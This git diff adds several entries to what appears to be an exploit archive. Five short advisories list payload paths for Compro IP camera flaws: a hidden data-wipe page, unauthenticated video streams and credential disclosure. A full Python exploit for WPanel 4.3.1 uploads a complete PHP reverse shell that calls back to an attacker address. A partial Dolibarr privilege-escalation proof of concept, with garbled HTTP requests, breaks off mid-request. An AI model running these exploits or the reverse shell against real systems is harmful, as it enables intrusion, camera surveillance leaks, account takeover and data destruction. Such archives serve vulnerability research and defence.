diff --git a/exploits/hardware/webapps/50250.txt b/exploits/hardware/webapps/50250.txt new file mode 100644 index 000000000..1bcad1748 --- /dev/null +++ b/exploits/hardware/webapps/50250.txt @@ -0,0 +1,16 @@ +# Exploit Title: Compro Technology IP Camera - 'killps.cgi' Denial-of-Service (DoS) +# Date: 2021-09-30 +# Exploit Author: icekam,xiao13,Rainbow,tfsec +# Software Link: http://www.comprotech.com.hk/ +# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 +# CVE : CVE-2021-40378 + +There is a backdoor prefabricated in the device in this path. Accessing the +file through the browser after logging in will cause the device to delete +all data (including the data of the camera itself). + +Payload:Visit this page after logging in +/cgi-bin/support/killps.cgi + +please refer to: +https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md \ No newline at end of file diff --git a/exploits/hardware/webapps/50251.txt b/exploits/hardware/webapps/50251.txt new file mode 100644 index 000000000..bd1d8246c --- /dev/null +++ b/exploits/hardware/webapps/50251.txt @@ -0,0 +1,14 @@ +# Exploit Title: Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated) +# Date: 2021-09-30 +# Exploit Author: icekam,xiao13,Rainbow,tfsec +# Software Link: http://www.comprotech.com.hk/ +# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 +# CVE : CVE-2021-40379 + +Some devices have unauthorized access to rstp, which can lead to the +leakage of surveillance video stream information. + +Payload:rstp://.../medias2 + +please refer to: +https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md \ No newline at end of file diff --git a/exploits/hardware/webapps/50252.txt b/exploits/hardware/webapps/50252.txt new file mode 100644 index 000000000..08dde234b --- /dev/null +++ b/exploits/hardware/webapps/50252.txt @@ -0,0 +1,18 @@ +# Exploit Title: Compro Technology IP Camera - 'Multiple' Credential Disclosure +# Date: 2021-09-30 +# Exploit Author: icekam,xiao13,Rainbow,tfsec +# Software Link: http://www.comprotech.com.hk/ +# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 +# CVE : CVE-2021-40380 + +There are unauthorized access vulnerabilities, which can lead to the +disclosure of device administrator usernames and passwords or rstp +usernames and passwords. + +Payload: + +/cgi-bin/cameralist/cameralist.cgi +/cgi-bin/cameralist/setcamera.cgi?id=* + +please refer to: +https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md \ No newline at end of file diff --git a/exploits/hardware/webapps/50253.txt b/exploits/hardware/webapps/50253.txt new file mode 100644 index 000000000..9de522738 --- /dev/null +++ b/exploits/hardware/webapps/50253.txt @@ -0,0 +1,16 @@ +# Exploit Title: Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure +# Date: 2021-09-30 +# Exploit Author: icekam,xiao13,Rainbow,tfsec +# Software Link: http://www.comprotech.com.hk/ +# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 +# CVE : CVE-2021-40381 + +Has an unauthorized access vulnerability, which can lead to unauthorized +access to the camera video page. + +Payload: + +/cgi-bin/view/index_MJpeg.cgi + +please refer to: +https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md \ No newline at end of file diff --git a/exploits/hardware/webapps/50254.txt b/exploits/hardware/webapps/50254.txt new file mode 100644 index 000000000..e9749bfa3 --- /dev/null +++ b/exploits/hardware/webapps/50254.txt @@ -0,0 +1,16 @@ +# Exploit Title: Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure +# Date: 2021-09-30 +# Exploit Author: icekam,xiao13,Rainbow,tfsec +# Software Link: http://www.comprotech.com.hk/ +# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540 +# CVE : CVE-2021-40382 + +There is an unauthorized access vulnerability, which can lead to +unauthorized access to camera video screenshots. + +Payload: + +/mjpegStreamer.cgi + +please refer to: +https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md \ No newline at end of file diff --git a/exploits/multiple/webapps/50255.txt b/exploits/multiple/webapps/50255.txt new file mode 100644 index 000000000..dd54d97dc --- /dev/null +++ b/exploits/multiple/webapps/50255.txt @@ -0,0 +1,265 @@ +# Exploit Title: WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated) +# Date: 07/06/2021 +# Exploit Author: Sentinal920 +# Vendor Homepage: https://github.com/wpanel +# Software Link: https://github.com/wpanel/wpanel4-cms +# Version: 4.3.1 +# Tested on: Linux + +import requests +import random,string + + +# Change This +################################### +url = 'http://192.168.182.134:8080' +email = 'admin@localhost.com' +password = 'admin' +################################### + +# PHP reverse shell used: https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/php_reverse_shell.php +# Works on linux/windows/mac + +########################################################################### +# Make sure to change lhost and lport in the reverse shell below (Line 223) +########################################################################### + + +# Get_Cookies +r = requests.get(url) +r2 = requests.get(url,cookies=r.cookies) +cookie = r2.cookies['wpanel_csrf_cookie'] +name = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(9)) + +payload = ''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="wpanel_csrf_token" + +'''+cookie+''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="titulo" + +'''+name+''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="descricao" + +'''+name+''' +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="tags" + +tesad +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="userfile"; filename="php-reverse-shell.php" +Content-Type: application/x-php + + array('pipe', 'r'), // shell can read from STDIN + 1 => array('pipe', 'w'), // shell can write to STDOUT + 2 => array('pipe', 'w') // shell can write to STDERR + ); + private $options = array(); // proc_open() options + private $buffer = 1024; // read/write buffer size + private $clen = 0; // command length + private $error = false; // stream read/write error + public function __construct($addr, $port) { + $this->addr = $addr; + $this->port = $port; + } + private function detect() { + $detected = true; + if (stripos(PHP_OS, 'LINUX') !== false) { // same for macOS + $this->os = 'LINUX'; + $this->shell = '/bin/sh'; + } else if (stripos(PHP_OS, 'WIN32') !== false || stripos(PHP_OS, 'WINNT') !== false || stripos(PHP_OS, 'WINDOWS') !== false) { + $this->os = 'WINDOWS'; + $this->shell = 'cmd.exe'; + $this->options['bypass_shell'] = true; // we do not want a shell within a shell + } else { + $detected = false; + echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n"; + } + return $detected; + } + private function daemonize() { + $exit = false; + if (!function_exists('pcntl_fork')) { + echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n"; + } else if (($pid = @pcntl_fork()) < 0) { + echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n"; + } else if ($pid > 0) { + $exit = true; + echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n"; + } else if (posix_setsid() < 0) { + // once daemonized you will actually no longer see the script's dump + echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n"; + } else { + echo "DAEMONIZE: Completed successfully!\n"; + } + return $exit; + } + private function settings() { + @error_reporting(0); + @set_time_limit(0); // do not impose the script execution time limit + @umask(0); // set the file/directory permissions - 666 for files and 777 for directories + } + private function dump($data) { + $data = str_replace('<', '<', $data); + $data = str_replace('>', '>', $data); + echo $data; + } + private function read($stream, $name, $buffer) { + if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream + $this->error = true; // set global error flag + echo "STRM_ERROR: Cannot read from ${name}, script will now exit...\n"; + } + return $data; + } + private function write($stream, $name, $data) { + if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream + $this->error = true; // set global error flag + echo "STRM_ERROR: Cannot write to ${name}, script will now exit...\n"; + } + return $bytes; + } + // read/write method for non-blocking streams + private function rw($input, $output, $iname, $oname) { + while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { + if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length + $this->dump($data); // script's dump + } + } + // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) + // we must read the exact byte length from a stream and not a single byte more + private function brw($input, $output, $iname, $oname) { + $size = fstat($input)['size']; + if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { + // for some reason Windows OS pipes STDIN into STDOUT + // we do not like that + // we need to discard the data from the stream + while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { + $this->clen -= $bytes; + $size -= $bytes; + } + } + while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { + $size -= $bytes; + $this->dump($data); // script's dump + } + } + public function run() { + if ($this->detect() && !$this->daemonize()) { + $this->settings(); + + // ----- SOCKET BEGIN ----- + $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); + if (!$socket) { + echo "SOC_ERROR: {$errno}: {$errstr}\n"; + } else { + stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS + + // ----- SHELL BEGIN ----- + $process = @proc_open($this->shell, $this->descriptorspec, $pipes, '/', null, $this->options); + if (!$process) { + echo "PROC_ERROR: Cannot start the shell\n"; + } else { + foreach ($pipes as $pipe) { + stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS + } + + // ----- WORK BEGIN ----- + @fwrite($socket, "SOCKET: Shell has connected! PID: " . proc_get_status($process)['pid'] . "\n"); + do { + if (feof($socket)) { // check for end-of-file on SOCKET + echo "SOC_ERROR: Shell connection has been terminated\n"; break; + } else if (feof($pipes[1]) || !proc_get_status($process)['running']) { // check for end-of-file on STDOUT or if process is still running + echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams + } // use proc_get_status() instead + $streams = array( + 'read' => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR + 'write' => null, + 'except' => null + ); + $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], null); // wait for stream changes | will not wait on Windows OS + if ($num_changed_streams === false) { + echo "STRM_ERROR: stream_select() failed\n"; break; + } else if ($num_changed_streams > 0) { + if ($this->os === 'LINUX') { + if (in_array($socket , $streams['read'])) { $this->rw($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN + if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET + if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET + } else if ($this->os === 'WINDOWS') { + // order is important + if (in_array($socket, $streams['read'])) { $this->rw ($socket , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN + if (fstat($pipes[2])['size']/*-------*/) { $this->brw($pipes[2], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET + if (fstat($pipes[1])['size']/*-------*/) { $this->brw($pipes[1], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET + } + } + } while (!$this->error); + // ------ WORK END ------ + + foreach ($pipes as $pipe) { + fclose($pipe); + } + proc_close($process); + } + // ------ SHELL END ------ + + fclose($socket); + } + // ------ SOCKET END ------ + + } + } +} +echo '
'; +// change the host address and/or port number as necessary +$sh = new Shell('192.168.182.136', 9000); +$sh->run(); +unset($sh); +// garbage collector requires PHP v5.3.0 or greater +// @gc_collect_cycles(); +echo ''; +?> + + +-----------------------------45668787242378192391383974033 +Content-Disposition: form-data; name="status" + +1 +-----------------------------45668787242378192391383974033-- + + +''' +data = 'wpanel_csrf_token='+cookie+'&email='+email+'&password='+password +headers = {'Content-Type': 'application/x-www-form-urlencoded'} +# Login_as_admin +r3 = requests.post(url+'/index.php/admin/login',cookies=r.cookies,headers=headers,data=data) + + +def exploit_gallery(): + + # Adding_Reverse_Shell + headers2 = {'Content-Type': 'multipart/form-data; boundary=---------------------------45668787242378192391383974033'} + r4 = requests.post(url + '/index.php/admin/galleries/add',cookies=r.cookies,headers=headers2,data=payload) + + print('') + print('Shell Uploaded as: '+name) + print('') + print('Visit: '+url+'/index.php/admin/galleries') + print('OR') + print('Visit: '+url+'/index.php/galleries') + print('') + +exploit_gallery() + + +#def exploit_post(): +#def exloit_pages(): +#def dashboard_avatar_image(): \ No newline at end of file diff --git a/exploits/php/webapps/50248.txt b/exploits/php/webapps/50248.txt new file mode 100644 index 000000000..f422d58a0 --- /dev/null +++ b/exploits/php/webapps/50248.txt @@ -0,0 +1,192 @@ +# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation +# Date: April 8, 2021 +# Exploit Author: Vishwaraj101 +# Vendor Homepage: https://www.dolibarr.org/ +# Affected Version: <= 14.0.1 +# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d + +*Summary:* +Using the below chain of issues attacker can compromise any dolibarr +user account including the admin. + +*Poc:* + + 1. Visit https://example.com/api/index.php/login?login=demo&password=demo + try to login with a test user with 0 permissons or less permissions. + 2. We will receive an api token in return. + 3. Next we need to fetch the user id of the user whose account we want + to own. + + + +*First we need to fetch the user id of the admin user using the below api.* + +*Request1:* + +GET /api/index.php/users/login/admin HTTP/1.1Host: +preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept: +application/json +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close + +*This will return the user details using the username. Now update the +victim user account via below api (include the json body received from the +previous request1 and replace the email id from below json to the attacker +controlled email)* + + +*Request2:*PUT /api/index.php/users/*12* HTTP/1.1 + +Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; +WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 +Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: +application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, +deflateDOLAPIKEY: test1337Origin: +https://preview2.dolibarr.orgConnection: closeReferer: +http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: +3221 +{ + "id": "12", + "statut": "1", + "employee": "1", + "civility_code": null, + "gender": "woman", + "birth": 495583200, + "email": "*attacker@example.com